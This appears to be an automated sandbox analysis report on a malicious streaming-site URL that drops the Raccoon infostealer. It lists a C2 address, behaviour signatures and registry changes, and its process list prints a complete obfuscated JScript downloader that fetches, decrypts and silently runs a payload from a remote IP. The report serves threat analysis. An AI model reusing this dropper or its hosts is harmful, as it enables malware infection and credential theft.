Analysis
-
max time kernel
67s -
max time network
71s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
15-12-2022 18:00
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.nu6i-bg-net.com/%D0%B2-%D1%81%D1%8A%D1%80%D1%86%D0%B5%D1%82%D0%BE-%D0%BD%D0%B0-%D0%BC%D0%B0%D1%88%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-in-the-heart-of-the-machine-2022-%D0%BE%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD-%D1%84%D0%B8_3dad8908e.html
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
https://www.nu6i-bg-net.com/%D0%B2-%D1%81%D1%8A%D1%80%D1%86%D0%B5%D1%82%D0%BE-%D0%BD%D0%B0-%D0%BC%D0%B0%D1%88%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-in-the-heart-of-the-machine-2022-%D0%BE%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD-%D1%84%D0%B8_3dad8908e.html
Resource
win7-20221111-en
Behavioral task
behavioral3
Sample
https://www.nu6i-bg-net.com/%D0%B2-%D1%81%D1%8A%D1%80%D1%86%D0%B5%D1%82%D0%BE-%D0%BD%D0%B0-%D0%BC%D0%B0%D1%88%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-in-the-heart-of-the-machine-2022-%D0%BE%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD-%D1%84%D0%B8_3dad8908e.html
Resource
win10v2004-20221111-en
General
-
Target
https://www.nu6i-bg-net.com/%D0%B2-%D1%81%D1%8A%D1%80%D1%86%D0%B5%D1%82%D0%BE-%D0%BD%D0%B0-%D0%BC%D0%B0%D1%88%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-in-the-heart-of-the-machine-2022-%D0%BE%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD-%D1%84%D0%B8_3dad8908e.html
Malware Config
Extracted
raccoon
d87b51d1771107cfddb7c7acd7727950
http://147.135.62.201/
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 239 4840 wscript.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
pbngq.exepid process 3832 pbngq.exe -
Loads dropped DLL 3 IoCs
Processes:
pbngq.exepid process 3832 pbngq.exe 3832 pbngq.exe 3832 pbngq.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\nu6i-bg-net.com\Total = "335" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\player.nu6i-bg-net.com\ = "12" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "729" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31002807" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0f5c7aeb710d901 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\nu6i-bg-net.com\Total = "598" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31002807" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D867ED2E-7CAA-11ED-A7A3-72AB8D3A8EDB} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "529" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "377912442" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31002807" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\ncadistrictfair.org\Total = "110" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\player.nu6i-bg-net.com\ = "576" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "834" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\nu6i-bg-net.com\Total = "17" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\player.nu6i-bg-net.com\ = "61" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\testingmetriksbre.ru\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.nu6i-bg-net.com\ = "131" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\nu6i-bg-net.com\Total = "344" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\player.nu6i-bg-net.com\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\testingmetriksbre.ru\ = "9" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "813" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3010717775" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\player.nu6i-bg-net.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "449" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "1306" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\testingmetriksbre.ru\Total = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\testingmetriksbre.ru\ = "938" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\nu6i-bg-net.com\Total = "10" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2913209571" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "1337" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "10" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\nu6i-bg-net.com\NumberOfSubdomains = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\testingmetriksbre.ru\ = "90" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "1180" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\nu6i-bg-net.com\Total = "396" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "671" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\nu6i-bg-net.com\Total = "1038" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2922588866" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.nu6i-bg-net.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "73" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\player.nu6i-bg-net.com\ = "607" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a6a3691b765cab4281b0a5d2dda83cb4000000000200000000001066000000010000200000005a82558041aed5c588bb8a4b904bb466103159426732b91c8a3ea6cf66d61ac5000000000e8000000002000020000000aebf6d8b2f66b20e2fc063c3b6841e7bfa910ca9134db715d9d545e400c72d992000000028d6845bb072ccb7e77791cd7c610b255e59ca6f3e1bec5f79a37272a58f141740000000b016739a88a5c66d750cf7b4aedce25b7d7016ff3544cf8a12e72353aa2320f11d0e7d57b805cff5930de69a22b89f1e2cb52516533e90e5d43e136adba54cd7 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a6a3691b765cab4281b0a5d2dda83cb40000000002000000000010660000000100002000000059bb386b71715fddefbdfa15719ec7824370bae56141e26b08d1f95abcf59438000000000e80000000020000200000000484c18508f2accb11001d7f10c5143f22c0676255eba01446a09f7a69f7246d20000000cfa957d6476cb778188d6afd4d6c42777531399ab3eff4cb6541eb9b815891c240000000776dc0cb78765afb74f6fbdcc55266b65425b8ce399c7dd8d2ce73a4135e964cc37fb211b46f449273af89884cb5148883136349f8363ca5b22b2a43e16008d7 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "480" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
IEXPLORE.EXEdescription pid process Token: SeShutdownPrivilege 3784 IEXPLORE.EXE Token: SeCreatePagefilePrivilege 3784 IEXPLORE.EXE Token: SeShutdownPrivilege 3784 IEXPLORE.EXE Token: SeCreatePagefilePrivilege 3784 IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
iexplore.exepid process 2668 iexplore.exe 2668 iexplore.exe 2668 iexplore.exe 2668 iexplore.exe -
Suspicious use of SetWindowsHookEx 22 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEpid process 2668 iexplore.exe 2668 iexplore.exe 3784 IEXPLORE.EXE 3784 IEXPLORE.EXE 3784 IEXPLORE.EXE 3784 IEXPLORE.EXE 3784 IEXPLORE.EXE 3784 IEXPLORE.EXE 2668 iexplore.exe 2668 iexplore.exe 3584 IEXPLORE.EXE 3584 IEXPLORE.EXE 2668 iexplore.exe 2668 iexplore.exe 4008 IEXPLORE.EXE 4008 IEXPLORE.EXE 2668 iexplore.exe 2668 iexplore.exe 1572 IEXPLORE.EXE 1572 IEXPLORE.EXE 3784 IEXPLORE.EXE 3784 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 2668 wrote to memory of 3784 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 3784 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 3784 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 3584 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 3584 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 3584 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 4008 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 4008 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 4008 2668 iexplore.exe IEXPLORE.EXE PID 4008 wrote to memory of 4996 4008 IEXPLORE.EXE cmd.exe PID 4008 wrote to memory of 4996 4008 IEXPLORE.EXE cmd.exe PID 4008 wrote to memory of 4996 4008 IEXPLORE.EXE cmd.exe PID 4996 wrote to memory of 4840 4996 cmd.exe wscript.exe PID 4996 wrote to memory of 4840 4996 cmd.exe wscript.exe PID 4996 wrote to memory of 4840 4996 cmd.exe wscript.exe PID 2668 wrote to memory of 1572 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 1572 2668 iexplore.exe IEXPLORE.EXE PID 2668 wrote to memory of 1572 2668 iexplore.exe IEXPLORE.EXE PID 4840 wrote to memory of 2652 4840 wscript.exe cmd.exe PID 4840 wrote to memory of 2652 4840 wscript.exe cmd.exe PID 4840 wrote to memory of 2652 4840 wscript.exe cmd.exe PID 2652 wrote to memory of 3832 2652 cmd.exe pbngq.exe PID 2652 wrote to memory of 3832 2652 cmd.exe pbngq.exe PID 2652 wrote to memory of 3832 2652 cmd.exe pbngq.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.nu6i-bg-net.com/%D0%B2-%D1%81%D1%8A%D1%80%D1%86%D0%B5%D1%82%D0%BE-%D0%BD%D0%B0-%D0%BC%D0%B0%D1%88%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-in-the-heart-of-the-machine-2022-%D0%BE%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD-%D1%84%D0%B8_3dad8908e.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:82958 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:82969 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["WaitFor"+"Response"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>U.tMp && stArt wsCripT //B //E:JScript U.tMp "ghjghjtffg45" "http://45.138.26.93/?Nzc2MDg=&RNnzRrx&xcvxcvxc354=doge&cxvxcvxcv323=103fneo.110xz65.406u9l8e5&xcvcxvxc434=zn_QMvXcJwDQC4HJKeXD&vbnvbnvbnvn43=fio&cxvxcvxcv243=SLtNP03OH06UgdrahK-PQ9nBKGnihLL5UUSk6B2aClzh8fp-KrtQbwHojBDSLlM3yo8PV1MVoqyri0LWn0PNhZSKqxSIUQ9Az8_VF7IL&zizxYwdTNzA2Mw==" "43⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript U.tMp "ghjghjtffg45" "http://45.138.26.93/?Nzc2MDg=&RNnzRrx&xcvxcvxc354=doge&cxvxcvxcv323=103fneo.110xz65.406u9l8e5&xcvcxvxc434=zn_QMvXcJwDQC4HJKeXD&vbnvbnvbnvn43=fio&cxvxcvxcv243=SLtNP03OH06UgdrahK-PQ9nBKGnihLL5UUSk6B2aClzh8fp-KrtQbwHojBDSLlM3yo8PV1MVoqyri0LWn0PNhZSKqxSIUQ9Az8_VF7IL&zizxYwdTNzA2Mw==" "44⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c pbngq.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pbngq.exepbngq.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:82987 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
2KB
MD5602cebd424613d514b439fe78f14a48d
SHA1d5d7580e513e9b4af91e1a8bcdd5401ab98636f6
SHA25629fabef3eb6d67f8ff9b015375b8fa6b6bced5e8c1651f2199fcb183f33578aa
SHA512fb2cda553e81eee089a166a0da126f9b4cff2ce5dba999ea87a4bfd1d396198f93e17391f408b2b5fa76e5a021717c4c349dede102e3e7eb1f51b44d407cb8b2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5ec8ff3b1ded0246437b1472c69dd1811
SHA1d813e874c2524e3a7da6c466c67854ad16800326
SHA256e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
1KB
MD501799e348449bc0c99f6b6cf0e9d2d0b
SHA16c1f6c1239b6723362bdf7c43c0e87b77ecac9af
SHA256a9ea357487fc10af00e494eae3f3c05201e3b5b8a79a0f8017bcbb88e20f0f4e
SHA51247b0010f2c4ff8e98609a02e25f26d3256c52c9091eab864841489c7f9d6e930a14395b131ddf9f2e54fcd636e649141670b3ecb8170ecd8ba075450a8531572
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\35FB221B38117795CFFF0D3271271BA2Filesize
503B
MD5518e22f42b685815334ef9ea43e33403
SHA10c2c959f71eea35c01144995cbb6b5bfa48eab3e
SHA25609b9819d023900f846f405f075fd116b7285ca941491f1c41b7d8c3104d7fa26
SHA5129fc02e12061b2c204b79d56eda594d022ffa07627c3d74afd2fec67aaca653037c1576b36202e6463d057fd228ad38762cd722ee694c630c3de380c41c2d305e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27Filesize
1KB
MD5a8ccb1c96249609cdf477c986a66a950
SHA1e6dd65e060ade24f88509054d9a8ce7e72845377
SHA2566a8bc4f0f6da83dc6cea5a7c37bb6e3087cc4e7b64d79024a3bc51e5b884abe6
SHA5126f574428b33e91aae6bd0330271754445b2d819b5fc3121a12a947b16a2372bb6df49c1b7e6ab5c3ebbc95e4bdef6765975113febf1ad2c01011e42b2370c06a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776Filesize
471B
MD5f858ba1a816dd020e5af93bff48aaa7c
SHA1171a4e5f3fc126ed213d0cefcd64639f892cb31b
SHA256e0cbc49b2de6d153786f381793895f2011f0f918cf9c17ccdc9fffa611546921
SHA512fc2a6de8eaa89bdfd8b4efd951e1a06919db0a27fa3ff571804d0220c8ba4797021a162461dc7f065d91146219979f33a821d6b8ff862f88e4ef66871ed19d74
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_93E4B2BA79A897B3100CCB27F2D3BF4FFilesize
1KB
MD5283d01d8ca9a66536d7786e5d473d3aa
SHA19f9dace144ee81e24457dd17fc4d79de983e1655
SHA256a6fa4dc54458b66f7e4ed0b1bc9431743d8a7ea4b7d40987313dbf7522f036f0
SHA51207764a57dd9e27cc16a314193fd4798c614320013b7135827b36a4ce13678fccec69105183aa9f3b9fbd621b6edfcf4dc09f60012280637024849730f0eec4fe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D6243C18F0F8F9AEC6638DD210F1984_0C739FD99CAB4C484C086C2BA92722BBFilesize
471B
MD50d63a8608d768832e735c0f3dfb8346d
SHA12b9b5a5285ba5a3fa0fafdaf7b77add2c06b3c69
SHA256272c2d33f2046565596d316122295c23d4a150c314e0a100d82c927c2a9790fa
SHA51269d435a6632c8d51326609ba57e32ffb04cfa6ce9f59cad4b647684ce15d89f25d9676de5b97df0b84d9346264c5d51801dad88fedce2756e9722320275e1c2e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8977EE46DEBDB8B110A1EFC4CBCB79A3Filesize
472B
MD519633ad3523ad8fea4bc26a57ae9a311
SHA1702e2a40f3c8c8ceb319ba6c5f8983c1a650d330
SHA256c5cc4c5e82037b66ea9ec7a574895c4bb8a2a9349f1ed271f5a266bc1f6a6a2a
SHA51277b37f77c956229ef469e8f4fa0418e84d1c44852206752eef5498225ea8e04bc556759f1d43979c9845258873d51b46fe65b43edc21296cfb03890b63fa6d82
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217DFilesize
472B
MD57ded1896628f431acd2e4a3d10ea3142
SHA1ad603e2b43da4629ede29f9f193ae5df09f3cbb8
SHA256dd4d3d2048b29affb30ddbbcf8112131cecdb15b0030a612c1d99cce54ab0132
SHA512221d337153b1c4cf92e69194126505b76bc683ead7675fc0c591bdc1289accad4c805e8ff9804bbfecd7e01716c4b391bc1d9f02cd1ebdb0250b6e659ae74c84
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A2DA6F30783AA21057D71A9E20DDC377Filesize
503B
MD5ccd6fb30443215b7ffbc742f09dd071b
SHA19743321a88de6c91118f8b6f958533ce98aeb411
SHA2564edc1c5ec4f75c90bb6f9340100ba798942288ea4d617e67a8fe903c931202e1
SHA512d34d0781ea9c41e6107096229b806f6ab921795c181951dd788272349fd7854ac5f1148a0d92de56f2aad6bf6c75793a68f10ff83dd5776dc1da766df5628041
-
